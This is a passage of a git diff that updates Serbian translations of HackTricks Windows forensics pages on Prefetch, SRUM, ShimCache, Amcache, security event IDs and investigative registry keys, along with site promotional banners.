**može pristupiti u bliskoj budućnosti** kako bi resursi mogli biti pristupljeni brže. +Prefetching je tehnika koja omogućava računaru da tiho **preuzme neophodne resurse potrebne za prikaz sadržaja** kojem korisnik **može pristupiti u bliskoj budućnosti** kako bi resursi mogli biti pristupljeni brže. -Windows prefetch se sastoji od kreiranja **keševa izvršenih programa** kako bi se mogli brže učitati. Ovi keševi se kreiraju kao `.pf` fajlovi unutar putanje: `C:\Windows\Prefetch`. Postoji ograničenje od 128 fajlova u XP/VISTA/WIN7 i 1024 fajlova u Win8/Win10. +Windows prefetch se sastoji od kreiranja **keševa izvršenih programa** kako bi ih mogao učitati brže. Ovi keševi se kreiraju kao `.pf` fajlovi unutar putanje: `C:\Windows\Prefetch`. Postoji ograničenje od 128 fajlova u XP/VISTA/WIN7 i 1024 fajlova u Win8/Win10. -Ime fajla se kreira kao `{ime_programa}-{heš}.pf` (heš je zasnovan na putanji i argumentima izvršnog fajla). U W10 ovi fajlovi su kompresovani. Imajte na umu da samo prisustvo fajla ukazuje da je **program izvršen** u nekom trenutku. +Ime fajla se kreira kao `{ime_programa}-{heš}.pf` (heš je zasnovan na putanji i argumentima izvršne datoteke). U W10 ovi fajlovi su kompresovani. Imajte na umu da samo prisustvo fajla ukazuje da je **program izvršen** u nekom trenutku. -Fajl `C:\Windows\Prefetch\Layout.ini` sadrži **imena fascikli fajlova koji su prefetovani**. Ovaj fajl sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **fajlovima** **otvorenim** od strane programa. +Fajl `C:\Windows\Prefetch\Layout.ini` sadrži **imena foldera fajlova koji su predviđeni**. Ovaj fajl sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **fajlovima** **otvorenim** od strane programa. Za pregled ovih fajlova možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): ```bash @@ -314,8 +315,8 @@ Za pregled ovih fajlova možete koristiti alat [**PEcmd.exe**](https://github.co ### Superprefetch -**Superprefetch** ima isti cilj kao prefetch, **ubrzati učitavanje programa** predviđajući šta će se učitati sledeće. Međutim, ne zamenjuje prefetch servis.\ -Ovaj servis će generisati baze podataka u `C:\Windows\Prefetch\Ag*.db`. +**Superprefetch** ima isti cilj kao prefetch, **ubrzava učitavanje programa** predviđajući šta će se učitati sledeće. Međutim, ne zamenjuje prefetch servis.\ +Ovaj servis će generisati bazu podataka u `C:\Windows\Prefetch\Ag*.db`. U ovim bazama podataka možete pronaći **ime programa**, **broj izvršavanja**, **otvorene datoteke**, **pristupane zapremine**, **potpunu putanju**, **vremenske okvire** i **vremenske oznake**. @@ -323,7 +324,7 @@ Ove informacije možete pristupiti koristeći alat [**CrowdResponse**](https://w ### SRUM -**System Resource Usage Monitor** (SRUM) **prati** **resurse** **potrošene od strane procesa**. Pojavio se u W8 i podatke čuva u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`. +**System Resource Usage Monitor** (SRUM) **prati** **resurse** **konzumirane** **od procesa**. Pojavio se u W8 i podatke čuva u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`. Daje sledeće informacije: @@ -343,9 +344,9 @@ Možete dobiti podatke iz ovog fajla koristeći alat [**srum\_dump**](https://gi ``` ### AppCompatCache (ShimCache) -**AppCompatCache**, poznat i kao **ShimCache**, čini deo **Baze podataka o kompatibilnosti aplikacija** razvijene od strane **Microsoft**-a kako bi se rešili problemi sa kompatibilnošću aplikacija. Ovaj sistemski komponent beleži različite delove metapodataka datoteka, uključujući: +**AppCompatCache**, poznat i kao **ShimCache**, čini deo **Baze podataka o kompatibilnosti aplikacija** koju je razvio **Microsoft** kako bi rešio probleme sa kompatibilnošću aplikacija. Ovaj sistemski komponent beleži različite delove metapodataka datoteka, uključujući: -- Puni put do datoteke +- Puni put datoteke - Veličina datoteke - Vreme poslednje izmene pod **$Standard\_Information** (SI) - Vreme poslednjeg ažuriranja ShimCache-a @@ -356,7 +357,7 @@ Ovi podaci se čuvaju u registru na određenim lokacijama zavisno od verzije ope - Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom od 96 unosa. - Za Server 2003, kao i za Windows verzije 2008, 2012, 2016, 7, 8 i 10, putanja skladištenja je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512 i 1024 unosa, redom. -Za parsiranje sačuvanih informacija, preporučuje se korišćenje alata [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser). +Za analizu sačuvanih informacija, preporučuje se korišćenje alata [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser). ![](<../../../.gitbook/assets/image (488).png>) @@ -366,23 +367,23 @@ Datoteka **Amcache.hve** je suštinski registarski hive koji beleži detalje o a Ova datoteka je značajna jer čuva zapise nedavno izvršenih procesa, uključujući putanje do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu. -Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti alat [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser). Sledeća komanda je primer kako koristiti AmcacheParser za parsiranje sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu: +Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti alat [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser). Sledeća komanda je primer kako koristiti AmcacheParser za analizu sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` Među generisanim CSV fajlovima, `Amcache_Unassociated file entries` je posebno značajan zbog obilja informacija koje pruža o nepovezanim unosima fajlova. -Najinteresantniji CSV fajl koji se generiše je `Amcache_Unassociated file entries`. +Najinteresantniji CSV fajl koji je generisan je `Amcache_Unassociated file entries`. ### RecentFileCache -Ovaj artefakt se može pronaći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnom izvršavanju određenih binarnih fajlova. +Ovaj artefakt može biti pronađen samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnom izvršavanju nekih binarnih fajlova. Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za parsiranje fajla. ### Planirani zadaci -Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i čitati ih kao XML fajlove. +Možete ih izdvojiti iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i čitati ih kao XML fajlove. ### Servisi @@ -393,7 +394,7 @@ Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete vide Instalirane aplikacije se mogu pronaći u `\ProgramData\Microsoft\Windows\AppRepository\`\ Ova repozitorijum ima **log** sa **svakom instaliranom aplikacijom** u sistemu unutar baze podataka **`StateRepository-Machine.srd`**. -Unutar tabele Aplikacija ove baze podataka, mogu se pronaći kolone: "ID aplikacije", "Broj paketa" i "Prikazano ime". Ove kolone sadrže informacije o preinstaliranim i instaliranim aplikacijama i može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-jevi instaliranih aplikacija trebalo da budu uzastopni. +Unutar tabele Aplikacija ove baze podataka, moguće je pronaći kolone: "ID aplikacije", "Broj paketa" i "Prikazano ime". Ove kolone sadrže informacije o preinstaliranim i instaliranim aplikacijama i može se pronaći da li su neke aplikacije deinstalirane jer bi ID-jevi instaliranih aplikacija trebalo da budu uzastopni. Takođe je moguće **pronaći instaliranu aplikaciju** unutar putanje registra: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ I **deinstalirane** **aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` @@ -410,19 +411,19 @@ Informacije koje se pojavljuju unutar Windows događaja su: Logovi se nalaze u `C:\Windows\System32\config` pre Windows Vista i u `C:\Windows\System32\winevt\Logs` posle Windows Vista. Pre Windows Vista, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju. -Lokacija fajlova sa događajima se može pronaći u registru SYSTEM u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +Lokacija fajlova događaja se može pronaći u registru SYSTEM pod **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** -Mogu se vizualizovati pomoću Windows pregledača događaja (**`eventvwr.msc`**) ili drugih alata poput [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** +Mogu se vizualizovati pomoću Windows pregledača događaja (**`eventvwr.msc`**) ili drugim alatima poput [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** -## Razumevanje beleženja događaja o bezbednosti u Windows-u +## Razumevanje Windows sigurnosnog beleženja događaja -Pristupni događaji se beleže u konfiguracionom fajlu bezbednosti koji se nalazi na lokaciji `C:\Windows\System32\winevt\Security.evtx`. Veličina ovog fajla je podesiva, a kada se dostigne kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijave i odjave korisnika, korisničke radnje, promene u postavkama bezbednosti, kao i pristup fajlovima, folderima i deljenim resursima. +Pristupni događaji se beleže u sigurnosnom konfiguracionom fajlu koji se nalazi na lokaciji `C:\Windows\System32\winevt\Security.evtx`. Veličina ovog fajla je podesiva, i kada se dostigne kapacitet, stariji događaji se prepisuju. Zabeleženi događaji uključuju prijave i odjave korisnika, korisničke radnje, promene sigurnosnih postavki, kao i pristup fajlovima, folderima i deljenim resursima. ### Ključni ID-jevi događaja za autentifikaciju korisnika: - **EventID 4624**: Ukazuje na uspešnu autentifikaciju korisnika. -- **EventID 4625**: Signalizira neuspešnu autentifikaciju. -- **EventID 4634/4647**: Predstavljaju događaje odjave korisnika. +- **EventID 4625**: Označava neuspešnu autentifikaciju. +- **EventIDs 4634/4647**: Predstavljaju događaje odjave korisnika. - **EventID 4672**: Označava prijavu sa administratorskim privilegijama. #### Pod-tipovi unutar EventID 4634/4647: @@ -431,7 +432,7 @@ Pristupni događaji se beleže u konfiguracionom fajlu bezbednosti koji se nalaz - **Mrežno (3)**: Pristup deljenim fasciklama. - **Batch (4)**: Izvršavanje batch procesa. - **Servis (5)**: Pokretanje servisa. -- **Proksi (6)**: Proksi autentifikacija. +- **Proxy (6)**: Proksi autentifikacija. - **Otključavanje (7)**: Ekran otključan lozinkom. - **Mrežni čisti tekst (8)**: Prenos lozinke u čistom tekstu, često od strane IIS-a. - **Nove akreditacije (9)**: Korišćenje različitih akreditacija za pristup. @@ -440,16 +441,16 @@ Pristupni događaji se beleže u konfiguracionom fajlu bezbednosti koji se nalaz - **Keš udaljeno interaktivno (12)**: Udaljena prijava sa keširanim akreditacijama. - **Keš otključavanje (13)**: Otključavanje sa keširanim akreditacijama. -#### Statusni i pod-statusni kodovi za EventID 4625: +#### Status i pod-status kodovi za EventID 4625: -- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad na enumeraciju korisničkih imena. -- **0xC000006A**: Ispravno korisničko ime ali pogrešna lozinka - Moguć pokušaj pogađanja ili napad grubom silom na lozinku. +- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad enumeracije korisničkih imena. +- **0xC000006A**: Ispravno korisničko ime ali pogrešna lozinka - Moguć pokušaj pogađanja lozinke ili napad grubom silom. - **0xC0000234**: Korisnički nalog zaključan - Može pratiti napad grubom silom koji rezultira višestrukim neuspešnim prijavama. - **0xC0000072**: Nalog onemogućen - Neovlašćeni pokušaji pristupa onemogućenim nalozima. - **0xC000006F**: Prijavljivanje van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih vremena prijave, mogući znak neovlašćenog pristupa. - **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijave sa neovlašćene lokacije. -- **0xC0000193**: Istek naloga - Pokušaji pristupa sa isteklim korisničkim nalozima. -- **0xC0000071**: Istekla lozinka - Pokušaji prijave sa zastarelim lozinkama. +- **0xC0000193**: Istečen nalog - Pokušaji pristupa sa isteklim korisničkim nalozima. +- **0xC0000071**: Istačena lozinka - Pokušaji prijave sa zastarelim lozinkama. - **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike razlike u vremenu između klijenta i servera mogu ukazivati na sofisticiranije napade poput "pass-the-ticket". - **0xC0000224**: Obavezna promena lozinke - Česte obavezne promene mogu ukazivati na pokušaj destabilizacije sigurnosti naloga. - **0xC0000225**: Ukazuje na problem u sistemu umesto sigurnosnog problema. @@ -462,7 +463,7 @@ Pristupni događaji se beleže u konfiguracionom fajlu bezbednosti koji se nalaz - **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje sistema. #### EventID 1102: -- **Brisanje logova**: Brisanje sigurnosnih logova, što je često znak prikrivanja nezakonitih aktivnosti. +- **Brisanje logova**: Sigurnosni logovi se brišu, što često ukazuje na prikrivanje nezakonitih aktivnosti. #### EventID-ovi za praćenje USB uređaja: - **20001 / 20003 / 10000**: Prvo povezivanje USB uređaja. @@ -471,7 +472,7 @@ Pristupni događaji se beleže u konfiguracionom fajlu bezbednosti koji se nalaz Za praktične primere simuliranja ovih tipova prijava i prilika za izvlačenje akreditacija, pogledajte [detaljni vodič Altered Security-a](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Detalji događaja, uključujući statusne i pod-statusne kodove, pružaju dodatne uvide u uzroke događaja, posebno značajni u Event ID 4625. +Detalji događaja, uključujući statusne i pod-statusne kodove, pružaju dodatne uvide u uzroke događaja, posebno značajne u Event ID 4625. ### Obnavljanje Windows događaja @@ -479,7 +480,7 @@ Da biste povećali šanse za obnavljanje obrisanih Windows događaja, preporučl ### Identifikacija uobičajenih napada putem Windows događaja -Za sveobuhvatan vodič o korišćenju Windows Event ID-jeva za identifikaciju uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/). +Za sveobuhvatan vodič o korišćenju Windows Event ID-jeva u identifikaciji uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/). #### Napadi grubom silom @@ -503,18 +504,3 @@ Bezbednosni EventID 1102 signalizira brisanje logova, što je ključni događaj
{% embed url="https://websec.nl/" %} - - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index a2fc5eadd..04a4a60a7 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,82 +2,104 @@ ### Interesantni Windows registarski ključevi +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} - -### **Windows verzija i informacije o vlasniku** -- Na lokaciji **`Software\Microsoft\Windows NT\CurrentVersion`**, možete pronaći Windows verziju, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način. +### **Informacije o verziji Windowsa i vlasniku** +- Na lokaciji **`Software\Microsoft\Windows NT\CurrentVersion`**, možete pronaći verziju Windowsa, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način. ### **Ime računara** -- Hostname se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. +- Ime računara se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. ### **Podešavanje vremenske zone** - Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**. ### **Pracenje vremena pristupa** -- Prema zadanim postavkama, praćenje vremena poslednjeg pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite: +- Podrazumevano, praćenje vremena poslednjeg pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite: `fsutil behavior set disablelastaccess 0` -### Windows verzije i Service Pack-ovi -- **Windows verzija** označava izdanje (npr. Home, Pro) i njegovo izdanje (npr. Windows 10, Windows 11), dok su **Service Pack-ovi** ažuriranja koja uključuju ispravke i ponekad nove funkcije. +### Verzije Windowsa i Service Pack-ovi +- **Verzija Windowsa** označava izdanje (npr. Home, Pro) i njegovo izdanje (npr. Windows 10, Windows 11), dok **Service Pack-ovi** predstavljaju ažuriranja koja uključuju popravke i ponekad nove funkcije. -### Omogućavanje praćenja vremena poslednjeg pristupa +### Omogućavanje vremena poslednjeg pristupa - Omogućavanje praćenja vremena poslednjeg pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema. ### Detalji o mrežnim informacijama -- Registar sadrži obimne podatke o mrežnim konfiguracijama, uključujući **vrste mreža (bežične, kablovske, 3G)** i **kategorije mreže (Javna, Privatna/Kućna, Domen/Posao)**, što je važno za razumevanje postavki mrežne sigurnosti i dozvola. +- Registar čuva obimne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablove, 3G)** i **kategorije mreže (Javna, Privatna/Domaća, Domen/Radna)**, što je od vitalnog značaja za razumevanje postavki bezbednosti mreže i dozvola. -### Klijentsko keširanje (CSC) -- **CSC** poboljšava pristup datotekama van mreže keširanjem kopija deljenih datoteka. Različite postavke **CSCFlags** kontrolišu način i koje datoteke se keširaju, što utiče na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom konekcijom. +### Keširanje klijentske strane (CSC) +- **CSC** poboljšava pristup datotekama van mreže keširanjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke su keširane, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom konekcijom. ### Programi koji se automatski pokreću -- Programi navedeni u različitim registarskim ključevima `Run` i `RunOnce` automatski se pokreću prilikom pokretanja sistema, utičući na vreme pokretanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera. +- Programi navedeni u različitim `Run` i `RunOnce` registarskim ključevima automatski se pokreću prilikom pokretanja sistema, utičući na vreme pokretanja sistema i potencijalno predstavljaju tačke interesa za identifikaciju malvera ili neželjenog softvera. ### Shellbags -- **Shellbags** ne samo da čuvaju postavke za prikaz fascikli, već pružaju i forenzičke dokaze o pristupu fasciklama čak i ako fascikla više ne postoji. Oni su neprocenjivi za istrage, otkrivajući korisničku aktivnost koja nije očigledna na druge načine. +- **Shellbags** ne samo da čuvaju preferencije za prikaze fascikli već pružaju i forenzičke dokaze o pristupu fasciklama čak i ako fascikla više ne postoji. Oni su neprocenjivi za istrage, otkrivajući aktivnosti korisnika koje nisu očigledne na druge načine. -### Informacije i forenzika o USB uređajima -- Detalji o USB uređajima koji se čuvaju u registru mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa prenosom osetljivih datoteka ili incidentima neovlašćenog pristupa. +### USB informacije i forenzika +- Detalji čuvani u registru o USB uređajima mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa prenosom osetljivih datoteka ili incidentima neovlašćenog pristupa. ### Serijski broj zapremine -- **Serijski broj zapremine** može biti ključan za praćenje specifične instance sistema datoteka, korisno u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke na različitim uređajima. +- **Serijski broj zapremine** može biti ključan za praćenje specifične instance sistema datoteka, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke na različitim uređajima. -### **Detalji o isključivanju** -- Vreme isključivanja i broj isključivanja (samo za XP) čuvaju se u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**. +### **Detalji isključenja** +- Vreme isključenja i broj (samo za XP) čuvaju se u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**. ### **Konfiguracija mreže** -- Za detaljne informacije o mrežnom interfejsu, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- Prva i poslednja vremena povezivanja na mrežu, uključujući VPN veze, beleže se pod različitim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. +- Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. +- Prvo i poslednje vreme povezivanja na mrežu, uključujući VPN veze, beleže se pod različitim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. -### **Deljene fascikle** -- Deljene fascikle i postavke nalaze se pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Postavke klijentskog keširanja (CSC) određuju dostupnost datoteka van mreže. +### **Deljeni folderi** +- Deljeni folderi i podešavanja nalaze se pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja keširanja klijentske strane (CSC) određuju dostupnost datoteka van mreže. ### **Programi koji se automatski pokreću** -- Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe koji se pokreću prilikom pokretanja sistema. +- Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja sistema. -### **Pretrage i uneti putovi** -- Pretrage i uneti putovi u Explorer-u se prate u registru pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, redom. +### **Pretrage i uneti putanje** +- Pretrage i unete putanje u Exploreru prate se u registru pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, redom. ### **Nedavni dokumenti i Office datoteke** -- Nedavno korišćeni dokumenti i Office datoteke se beleže u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama za verzije Office-a. +- Nedavni dokumenti i Office datoteke na koje je pristupano beleže se u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama za verzije Office-a. -### **Najskorije korišćene (MRU) stavke** +### **Nedavno korišćeni (MRU) elementi** - Liste MRU, koje pokazuju nedavne putanje do datoteka i komande, čuvaju se u različitim podključevima `ComDlg32` i `Explorer` pod `NTUSER.DAT`. -### **Pracenje korisničke aktivnosti** -- Funkcija User Assist beleži detaljne statistike o korišćenju aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na lokaciji **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +### **Pracenje aktivnosti korisnika** +- Funkcija User Assist beleži detaljnu statistiku korišćenja aplikacija, uključujući broj pokretanja i poslednje vreme pokretanja, na lokaciji **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Analiza Shellbags-a** -- Shellbags, koji otkrivaju detalje o pristupu fasciklama +- Shellbags, koji otkrivaju detalje pristupa fasciklama, čuvaju se u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu. + +### **Istorija USB uređaja** +- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja. +- Korisnik povezan sa određenim USB uređajem može se locirati pretragom `NTUSER.DAT` košnica za **{GUID}** uređaja. +- Poslednji montirani uređaj i njegov serijski broj zapremine mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, redom. + +Ovaj vodič sažima ključne putanje i metode za pristup detaljnim informacijama o sistemu, mreži i aktivnostima korisnika na Windows sistemima, teži ka jasnoći i upotrebljivosti. + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Podržite HackTricks + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index 266baa9d9..5956416dc 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,22 +1,23 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **oglašavanje vaše kompanije na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks 